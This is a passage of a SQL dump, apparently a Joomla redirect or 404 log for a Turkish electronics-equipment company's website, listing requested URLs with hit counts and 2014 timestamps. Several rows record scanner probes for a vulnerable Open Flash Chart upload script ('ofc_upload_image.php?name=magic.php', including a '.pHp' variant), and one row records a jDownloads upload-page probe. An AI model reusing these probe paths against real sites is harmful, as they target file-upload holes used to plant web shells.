00:00:00',301),(5826,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-09-21 06:00:42','0000-00-00 00:00:00',301),(5827,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2014-09-21 06:00:43','0000-00-00 00:00:00',301),(5828,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-09-21 06:00:43','0000-00-00 00:00:00',301),(5829,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2014-09-21 06:00:43','0000-00-00 00:00:00',301),(5830,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-09-21 06:00:44','0000-00-00 00:00:00',301),(5831,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2014-09-21 06:00:44','0000-00-00 00:00:00',301),(5832,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-09-21 06:00:44','0000-00-00 00:00:00',301),(5833,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2014-09-21 06:00:45','0000-00-00 00:00:00',301),(5834,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-09-21 06:00:45','0000-00-00 00:00:00',301),(5835,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2014-09-21 06:00:45','0000-00-00 00:00:00',301),(5836,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=42&Itemid=27','','','',1,0,'2014-09-21 06:32:09','0000-00-00 00:00:00',301),(5837,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157&Itemid=158','','','',1,0,'2014-09-21 07:53:08','0000-00-00 00:00:00',301),(5838,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=82&Itemid=38&lang=en','','','',1,0,'2014-09-21 07:56:13','0000-00-00 00:00:00',301),(5839,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152&Itemid=153','','','',6,0,'2014-09-21 07:56:46','0000-00-00 00:00:00',301),(5840,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119&Itemid=117','','','',2,0,'2014-09-21 08:04:38','0000-00-00 00:00:00',301),(5841,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=85:neocut&catid=51:neo&Itemid=97','','','',1,0,'2014-09-21 08:06:43','0000-00-00 00:00:00',301),(5842,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164&Itemid=160','','','',1,0,'2014-09-21 08:07:46','0000-00-00 00:00:00',301),(5843,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112','','','',1,0,'2014-09-21 08:08:20','0000-00-00 00:00:00',301),(5844,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107&Itemid=118','','','',1,0,'2014-09-21 08:10:55','0000-00-00 00:00:00',301),(5845,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115&Itemid=126','','','',1,0,'2014-09-21 08:28:23','0000-00-00 00:00:00',301),(5846,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156&Itemid=157','','','',2,0,'2014-09-21 08:30:28','0000-00-00 00:00:00',301),(5847,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157','','','',1,0,'2014-09-21 08:31:44','0000-00-00 00:00:00',301),(5848,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=160&Itemid=161&lang=en','','','',3,0,'2014-09-21 08:52:12','0000-00-00 00:00:00',301),(5849,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158&Itemid=159&lang=tr','','','',1,0,'2014-09-21 09:21:39','0000-00-00 00:00:00',301),(5850,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152','','','',1,0,'2014-09-21 09:30:12','0000-00-00 00:00:00',301),(5851,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139&Itemid=141','','','',1,0,'2014-09-21 09:30:44','0000-00-00 00:00:00',301),(5852,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=en','','','',2,0,'2014-09-21 09:31:17','0000-00-00 00:00:00',301),(5853,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=en','','','',3,0,'2014-09-21 09:35:53','0000-00-00 00:00:00',301),(5854,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=en','','','',1,0,'2014-09-21 10:06:45','0000-00-00 00:00:00',301),(5855,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71:rl131&catid=42:th-dizgi&Itemid=79','','','',1,0,'2014-09-21 10:33:46','0000-00-00 00:00:00',301),(5856,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138','','','',1,0,'2014-09-21 10:36:01','0000-00-00 00:00:00',301),(5857,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=83&Itemid=95','','','',1,0,'2014-09-21 10:43:56','0000-00-00 00:00:00',301),(5858,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=83:neomark&catid=51:neo&Itemid=95','','','',1,0,'2014-09-21 10:45:01','0000-00-00 00:00:00',301),(5859,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117&Itemid=128','','','',2,0,'2014-09-21 10:52:54','0000-00-00 00:00:00',301),(5860,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116','','','',1,0,'2014-09-21 11:08:41','0000-00-00 00:00:00',301),(5861,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=106&Itemid=113&lang=tr','','','',40,0,'2014-09-21 11:11:11','0000-00-00 00:00:00',301),(5862,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=107&Itemid=118&lang=tr','','','',3,0,'2014-09-21 11:11:17','0000-00-00 00:00:00',301),(5863,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=108&Itemid=119&lang=tr','','','',3,0,'2014-09-21 11:11:22','0000-00-00 00:00:00',301),(5864,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=109&Itemid=120&lang=tr','','','',3,0,'2014-09-21 11:11:29','0000-00-00 00:00:00',301),(5865,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=110&Itemid=121&lang=tr','','','',3,0,'2014-09-21 11:11:37','0000-00-00 00:00:00',301),(5866,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=117&Itemid=128&lang=tr','','','',3,0,'2014-09-21 11:11:44','0000-00-00 00:00:00',301),(5867,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=121&Itemid=115&lang=tr','','','',3,0,'2014-09-21 11:11:52','0000-00-00 00:00:00',301),(5868,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=122&Itemid=129&lang=tr','','','',3,0,'2014-09-21 11:11:58','0000-00-00 00:00:00',301),(5869,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=157&Itemid=158&lang=tr','','','',3,0,'2014-09-21 11:12:04','0000-00-00 00:00:00',301),(5870,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=166&Itemid=144&lang=tr','','','',3,0,'2014-09-21 11:12:11','0000-00-00 00:00:00',301),(5871,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=87&Itemid=99&lang=tr','','','',3,0,'2014-09-21 11:12:19','0000-00-00 00:00:00',301),(5872,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117','','','',1,0,'2014-09-21 11:36:48','0000-00-00 00:00:00',301),(5873,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50','','','',1,0,'2014-09-21 11:37:56','0000-00-00 00:00:00',301),(5874,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151','','','',1,0,'2014-09-21 11:39:04','0000-00-00 00:00:00',301),(5875,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=tr','','','',1,0,'2014-09-21 12:01:17','0000-00-00 00:00:00',301),(5876,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111&Itemid=122','','','',1,0,'2014-09-21 12:07:09','0000-00-00 00:00:00',301),(5877,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108&Itemid=119','','','',1,0,'2014-09-21 12:12:47','0000-00-00 00:00:00',301),(5878,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163','','','',1,0,'2014-09-21 14:52:45','0000-00-00 00:00:00',301),(5879,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141','','','',1,0,'2014-09-21 14:53:49','0000-00-00 00:00:00',301),(5880,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164','','','',1,0,'2014-09-21 15:00:05','0000-00-00 00:00:00',301),(5881,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154','','','',1,0,'2014-09-21 15:01:09','0000-00-00 00:00:00',301),(5882,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118','','','',1,0,'2014-09-21 15:02:11','0000-00-00 00:00:00',301),(5883,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153','','','',1,0,'2014-09-21 15:02:42','0000-00-00 00:00:00',301),(5884,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114&Itemid=124','','','',2,0,'2014-09-21 15:03:14','0000-00-00 00:00:00',301),(5885,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140','','','',1,0,'2014-09-21 15:31:13','0000-00-00 00:00:00',301),(5886,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81','','','',1,0,'2014-09-21 15:33:18','0000-00-00 00:00:00',301),(5887,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87:temizlik&catid=40:temizleme&Itemid=103&lang=tr','','','',8,0,'2014-09-21 15:37:29','0000-00-00 00:00:00',301),(5888,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146','','','',1,0,'2014-09-21 16:36:31','0000-00-00 00:00:00',301),(5889,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154&Itemid=156','','','',1,0,'2014-09-21 16:37:35','0000-00-00 00:00:00',301),(5890,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167&Itemid=163','','','',1,0,'2014-09-21 16:40:10','0000-00-00 00:00:00',301),(5891,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73&Itemid=82','','','',1,0,'2014-09-21 16:42:16','0000-00-00 00:00:00',301),(5892,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=en','','','',1,0,'2014-09-21 16:51:58','0000-00-00 00:00:00',301),(5893,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129','','','',1,0,'2014-09-21 18:14:53','0000-00-00 00:00:00',301),(5894,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164','','','',1,0,'2014-09-21 18:15:55','0000-00-00 00:00:00',301),(5895,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125','','','',1,0,'2014-09-21 18:22:43','0000-00-00 00:00:00',301),(5896,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112&Itemid=123','','','',2,0,'2014-09-21 18:24:50','0000-00-00 00:00:00',301),(5897,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121&Itemid=115','','','',1,0,'2014-09-21 18:26:23','0000-00-00 00:00:00',301),(5898,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147&Itemid=146','','','',1,0,'2014-09-21 18:29:32','0000-00-00 00:00:00',301),(5899,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136&Itemid=138','','','',1,0,'2014-09-21 18:34:46','0000-00-00 00:00:00',301),(5900,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128','','','',1,0,'2014-09-21 18:36:53','0000-00-00 00:00:00',301),(5901,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146&Itemid=148','','','',1,0,'2014-09-21 18:42:07','0000-00-00 00:00:00',301),(5902,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158&Itemid=159','','','',1,0,'2014-09-21 18:43:57','0000-00-00 00:00:00',301),(5903,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140&Itemid=142','','','',1,0,'2014-09-21 18:45:47','0000-00-00 00:00:00',301),(5904,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122','','','',1,0,'2014-09-21 18:47:22','0000-00-00 00:00:00',301),(5905,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159','','','',1,0,'2014-09-21 18:47:48','0000-00-00 00:00:00',301),(5906,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153&Itemid=154','','','',1,0,'2014-09-21 20:23:46','0000-00-00 00:00:00',301),(5907,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110&Itemid=121','','','',1,0,'2014-09-21 20:33:18','0000-00-00 00:00:00',301),(5908,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155&Itemid=81','','','',1,0,'2014-09-21 20:35:18','0000-00-00 00:00:00',301),(5909,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148','','','',1,0,'2014-09-21 20:47:21','0000-00-00 00:00:00',301),(5910,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141&Itemid=143','','','',2,0,'2014-09-21 20:47:53','0000-00-00 00:00:00',301),(5911,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=en','','','',3,0,'2014-09-21 21:27:09','0000-00-00 00:00:00',301),(5912,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139','','','',1,0,'2014-09-21 23:08:04','0000-00-00 00:00:00',301),(5913,'http://www.3s-technologies.com.tr//index.php?option=com_jdownloads&Itemid=0&view=upload','','','',214,0,'2014-09-22 01:32:26','0000-00-00 00:00:00',301),(5914,'http://www.3s-technologies.com.tr/index.php/en/javascript:void(0);','','','',1,0,'2014-09-22 06:00:25','0000-00-00 00:00:00',301),(5915,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71&Itemid=79','','','',12,0,'2014-09-22 07:07:00','0000-00-00 00:00:00',301),(5916,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=tr','','','',3,0,'2014-09-22 08:23:50','0000-00-00 00:00:00',301),(5917,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120&Itemid=116','','','',3,0,'2014-09-22 09:13:17','0000-00-00 00:00:00',301),(5918,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=en','','','',1,0,'2014-09-22 10:05:42','0000-00-00 00:00:00',301),(5919,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109&Itemid=120','','','',2,0,'2014-09-22 22:01:39','0000-00-00 00:00:00',301),(5920,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=158&Itemid=159&lang=tr','','','',32,0,'2014-09-24 07:19:20','0000-00-00 00:00:00',301),(5921,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=166&Itemid=144&lang=tr','','','',28,0,'2014-09-24 07:19:27','0000-00-00 00:00:00',301),(5922,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=94&Itemid=105&lang=en','','','',31,0,'2014-09-24 07:19:31','0000-00-00 00:00:00',301),(5923,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=96&Itemid=107&lang=en','','','',44,0,'2014-09-24 07:19:38','0000-00-00 00:00:00',301),(5924,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en&limitstart=5','','','',4,0,'2014-09-24 14:12:50','0000-00-00 00:00:00',301),(5925,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=149&lang=tr','','','',1,0,'2014-09-24 14:49:39','0000-00-00 00:00:00',301),(5926,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164','','','',1,0,'2014-09-25 02:34:02','0000-00-00 00:00:00',301),(5927,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123','','','',1,0,'2014-09-25 02:50:51','0000-00-00 00:00:00',301),(5928,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160&Itemid=161','','','',1,0,'2014-09-25 02:56:36','0000-00-00 00:00:00',301),(5929,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120','','','',1,0,'2014-09-25 06:29:58','0000-00-00 00:00:00',301),(5930,'http://www.3s-technologies.com.tr/index.php/en/homepage2/81-english-uk/','','','',14,0,'2014-09-25 08:33:07','0000-00-00 00:00:00',301),(5931,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139','','','',3,0,'2014-09-25 21:07:26','0000-00-00 00:00:00',301),(5932,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=103&lang=tr','','','',1,0,'2014-09-25 22:58:41','0000-00-00 00:00:00',301),(5933,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=en','','','',35,0,'2014-09-26 05:43:54','0000-00-00 00:00:00',301),(5934,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&Itemid=57&lang=en','','','',1,0,'2014-09-26 14:11:11','0000-00-00 00:00:00',301),(5935,'http://www.3s-technologies.com.tr/index.php/en/?catid=1:son-haberler&id=91:osai-neo&Itemid=28&lang=en&option=com_content&view=article','','','',28,0,'2014-10-01 13:20:06','0000-00-00 00:00:00',301),(5936,'http://www.3s-technologies.com.tr/index.php/en/?id=56&Itemid=137&lang=en&option=com_content&view=category','','','',3,0,'2014-10-01 13:26:05','0000-00-00 00:00:00',301),(5937,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=103&lang=tr','','','',3,0,'2014-10-01 13:28:39','0000-00-00 00:00:00',301),(5938,'http://www.3s-technologies.com.tr/index.php/en/?id=51&Itemid=92&lang=en&option=com_content&view=category','','','',3,0,'2014-10-01 13:33:56','0000-00-00 00:00:00',301),(5939,'http://www.3s-technologies.com.tr/index.php/en/?id=81&Itemid=40&lang=en&option=com_content&view=article','','','',2,0,'2014-10-01 13:37:59','0000-00-00 00:00:00',301),(5940,'http://www.3s-technologies.com.tr/index.php/en/?id=43&Itemid=2&lang=en&option=com_content&view=category','','','',2,0,'2014-10-01 13:40:10','0000-00-00 00:00:00',301),(5941,'http://www.3s-technologies.com.tr/index.php/tr/ana-sayfa','','','',46,0,'2014-10-01 13:53:53','0000-00-00 00:00:00',301),(5942,'http://www.3s-technologies.com.tr/index.php/en/?id=82&Itemid=38&lang=en&option=com_content&view=article','','','',1,0,'2014-10-01 14:06:57','0000-00-00 00:00:00',301),(5943,'http://www.3s-technologies.com.tr/index.php/en/?id=42&Itemid=27&lang=en&option=com_content&view=category','','','',2,0,'2014-10-01 14:07:05','0000-00-00 00:00:00',301),(5944,'http://www.3s-technologies.com.tr/index.php/en/?id=57&Itemid=145&lang=en&option=com_content&view=category','','','',2,0,'2014-10-01 14:10:51','0000-00-00 00:00:00',301),(5945,'http://www.3s-technologies.com.tr/index.php/tr/?id=57&Itemid=145&lang=en&option=com_content&view=category','','','',10,0,'2014-10-01 14:14:36','0000-00-00 00:00:00',301),(5946,'http://www.3s-technologies.com.tr/index.php/en/?id=39&Itemid=57&lang=en&option=com_content&view=category','','','',3,0,'2014-10-01 14:18:26','0000-00-00 00:00:00',301),(5947,'http://www.3s-technologies.com.tr/index.php/en/?id=127&Itemid=134&lang=en&option=com_content&view=article','','','',2,0,'2014-10-01 14:20:15','0000-00-00 00:00:00',301),(5948,'http://www.3s-technologies.com.tr/index.php/en/?id=59&Itemid=155&lang=en&option=com_content&view=category','','','',3,0,'2014-10-01 14:22:14','0000-00-00 00:00:00',301),(5949,'http://www.3s-technologies.com.tr/index.php/en/?id=88&Itemid=100&lang=en&option=com_content&view=article','','','',3,0,'2014-10-01 14:26:14','0000-00-00 00:00:00',301),(5950,'http://www.3s-technologies.com.tr/index.php/en/?id=40&Itemid=60&lang=en&option=com_content&view=category','','','',3,0,'2014-10-01 14:28:16','0000-00-00 00:00:00',301),(5951,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&limitstart=5&lang=en','','','',1,0,'2014-10-01 14:28:47','0000-00-00 00:00:00',301),(5952,'http://www.3s-technologies.com.tr/index.php/en/?id=90&Itemid=102&lang=en&option=com_content&view=article','','','',7,0,'2014-10-01 14:32:16','0000-00-00 00:00:00',301),(5953,'http://www.3s-technologies.com.tr/index.php/en/?id=168&Itemid=58&lang=en&option=com_content&view=article','','','',5,0,'2014-10-01 14:38:08','0000-00-00 00:00:00',301),(5954,'http://www.3s-technologies.com.tr/index.php/en/?id=41&Itemid=55&lang=en&option=com_content&view=category','','','',2,0,'2014-10-01 14:40:10','0000-00-00 00:00:00',301),(5955,'http://www.3s-technologies.com.tr/index.php/en/?id=124&Itemid=130&lang=en&option=com_content&view=article','','','',2,0,'2014-10-01 14:53:54','0000-00-00 00:00:00',301),(5956,'http://www.3s-technologies.com.tr/index.php/tr/?id=124&Itemid=130&lang=en&option=com_content&view=article','','','',17,0,'2014-10-01 14:55:54','0000-00-00 00:00:00',301),(5957,'http://www.3s-technologies.com.tr/index.php/tr/?id=36&Itemid=37&lang=tr&option=com_content&view=category','','','',9,0,'2014-10-01 15:00:01','0000-00-00 00:00:00',301),(5958,'http://www.3s-technologies.com.tr/index.php/en/?id=60&Itemid=164&lang=en&option=com_content&view=category','','','',2,0,'2014-10-01 15:04:05','0000-00-00 00:00:00',301),(5959,'http://www.3s-technologies.com.tr/index.php/tr/?id=60&Itemid=164&lang=en&option=com_content&view=category','','','',15,0,'2014-10-01 15:09:58','0000-00-00 00:00:00',301),(5960,'http://www.3s-technologies.com.tr/index.php/tr/?id=54&Itemid=114&lang=en&option=com_content&view=category','','','',19,0,'2014-10-01 15:13:50','0000-00-00 00:00:00',301),(5961,'http://www.3s-technologies.com.tr/index.php/en/?id=54&Itemid=114&lang=en&option=com_content&view=category','','','',2,0,'2014-10-01 15:15:48','0000-00-00 00:00:00',301),(5962,'http://www.3s-technologies.com.tr/index.php/en/?id=93&Itemid=104&lang=tr&option=com_content&view=article','','','',2,0,'2014-10-01 15:23:29','0000-00-00 00:00:00',301),(5963,'http://www.3s-technologies.com.tr/index.php/en/?id=53&Itemid=110&lang=en&option=com_content&view=category','','','',2,0,'2014-10-01 15:25:25','0000-00-00 00:00:00',301),(5964,'http://www.3s-technologies.com.tr/index.php/en/?id=49&Itemid=61&lang=en&option=com_content&view=category','','','',2,0,'2014-10-01 15:31:13','0000-00-00 00:00:00',301),(5965,'http://www.3s-technologies.com.tr/index.php/en/?id=1&Itemid=50&lang=en&layout=blog&option=com_content&view=category','','','',2,0,'2014-10-01 15:33:13','0000-00-00 00:00:00',301),(5966,'http://www.3s-technologies.com.tr/index.php/en/?id=1&Itemid=28&lang=en&layout=blog&option=com_content&view=category','','','',2,0,'2014-10-01 15:34:43','0000-00-00 00:00:00',301),(5967,'http://www.3s-technologies.com.tr/index.php/en/?id=44&Itemid=56&lang=en&option=com_content&view=category','','','',2,0,'2014-10-01 15:34:49','0000-00-00 00:00:00',301),(5968,'http://www.3s-technologies.com.tr/index.php/en/?id=164&Itemid=160&lang=tr&option=com_content&view=article','','','',2,0,'2014-10-01 15:34:56','0000-00-00 00:00:00',301),(5969,'http://www.3s-technologies.com.tr/index.php/tr/?id=125&Itemid=131&lang=en&option=com_content&view=article','','','',4,0,'2014-10-01 15:36:59','0000-00-00 00:00:00',301),(5970,'http://www.3s-technologies.com.tr/index.php/en/?id=43&Itemid=2&lang=tr&option=com_content&view=category','','','',1,0,'2014-10-01 15:39:01','0000-00-00 00:00:00',301),(5971,'http://www.3s-technologies.com.tr/index.php/en/?id=36&Itemid=37&lang=en&option=com_content&view=category','','','',2,0,'2014-10-01 15:43:03','0000-00-00 00:00:00',301),(5972,'http://www.3s-technologies.com.tr/index.php/tr/?id=36&Itemid=37&lang=en&option=com_content&view=category','','','',15,0,'2014-10-01 15:46:59','0000-00-00 